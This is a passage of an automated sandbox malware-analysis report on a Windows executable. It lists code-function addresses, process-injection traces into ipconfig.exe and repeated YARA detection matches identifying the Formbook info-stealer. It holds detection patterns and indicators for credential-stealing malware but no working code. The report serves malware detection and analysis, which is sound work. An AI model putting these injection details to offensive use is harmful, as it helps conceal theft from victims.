          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_016303DA5_2_016303DA
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_015AEBB05_2_015AEBB0
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_0162FA2B5_2_0162FA2B
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_016422AE5_2_016422AE
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_01641D555_2_01641D55
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_01642D075_2_01642D07
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_01570D205_2_01570D20
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_0158D5E05_2_0158D5E0
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_016425DD5_2_016425DD
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_015A25815_2_015A2581
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_0163D4665_2_0163D466
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_0158841F5_2_0158841F
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_01641FF15_2_01641FF1
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_0164DFCE5_2_0164DFCE
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_01596E305_2_01596E30
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_0163D6165_2_0163D616
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_01642EF75_2_01642EF7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00E228EC15_2_00E228EC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D6B09015_2_00D6B090
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00E220A815_2_00E220A8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D820A015_2_00D820A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00E1100215_2_00E11002
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D5F90015_2_00D5F900
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D7412015_2_00D74120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00E222AE15_2_00E222AE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00E1DBD215_2_00E1DBD2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D8EBB015_2_00D8EBB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00E22B2815_2_00E22B28
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00E1D46615_2_00E1D466
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D6841F15_2_00D6841F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D6D5E015_2_00D6D5E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00E225DD15_2_00E225DD
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D8258115_2_00D82581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00E21D5515_2_00E21D55
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00E22D0715_2_00E22D07
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D50D2015_2_00D50D20
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00E22EF715_2_00E22EF7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D76E3015_2_00D76E30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00E1D61615_2_00E1D616
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00E21FF115_2_00E21FF1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_003CCAC515_2_003CCAC5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_003B8C5015_2_003B8C50
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_003CC4E515_2_003CC4E5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_003B2D9015_2_003B2D90
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_003CC74215_2_003CC742
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_003B2FB015_2_003B2FB0
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: String function: 0157B150 appears 48 times
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 00D5B150 appears 35 times
          Source: 08917506_by_Libranalysis.exeBinary or memory string: OriginalFilename vs 08917506_by_Libranalysis.exe
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.261415495.00000000094D0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll@ vs 08917506_by_Libranalysis.exe
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.257338914.00000000076E0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs 08917506_by_Libranalysis.exe
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.257338914.00000000076E0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs 08917506_by_Libranalysis.exe
          Source: 08917506_by_Libranalysis.exe, 00000000.00000000.227243971.0000000000FC2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameNotFiniteNumberException.exeB vs 08917506_by_Libranalysis.exe
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252059704.0000000003631000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSimpleUI.dll( vs 08917506_by_Libranalysis.exe
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.258531380.0000000008BE0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameIEFRAME.DLLD vs 08917506_by_Libranalysis.exe
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.260684849.0000000009280000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs 08917506_by_Libranalysis.exe
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.258654930.0000000008C00000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs 08917506_by_Libranalysis.exe
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.256930094.00000000075F0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs 08917506_by_Libranalysis.exe
          Source: 08917506_by_Libranalysis.exeBinary or memory string: OriginalFilename vs 08917506_by_Libranalysis.exe
          Source: 08917506_by_Libranalysis.exe, 00000005.00000002.294838186.0000000000B22000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameNotFiniteNumberException.exeB vs 08917506_by_Libranalysis.exe
          Source: 08917506_by_Libranalysis.exe, 00000005.00000002.295432403.00000000017FF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 08917506_by_Libranalysis.exe
          Source: 08917506_by_Libranalysis.exe, 00000005.00000002.295601970.0000000003157000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs 08917506_by_Libranalysis.exe
          Source: 08917506_by_Libranalysis.exeBinary or memory string: OriginalFilenameNotFiniteNumberException.exeB vs 08917506_by_Libranalysis.exe
          Source: 08917506_by_Libranalysis.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000005.00000002.295482175.0000000001880000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.295482175.0000000001880000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.252705073.0000000004631000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.252705073.0000000004631000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.495362707.0000000000B90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.495362707.0000000000B90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.492372341.00000000003B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.492372341.00000000003B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.495228855.0000000000B50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.495228855.0000000000B50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.295106715.0000000001520000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.295106715.0000000001520000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.294777794.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.294777794.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.08917506_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.08917506_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal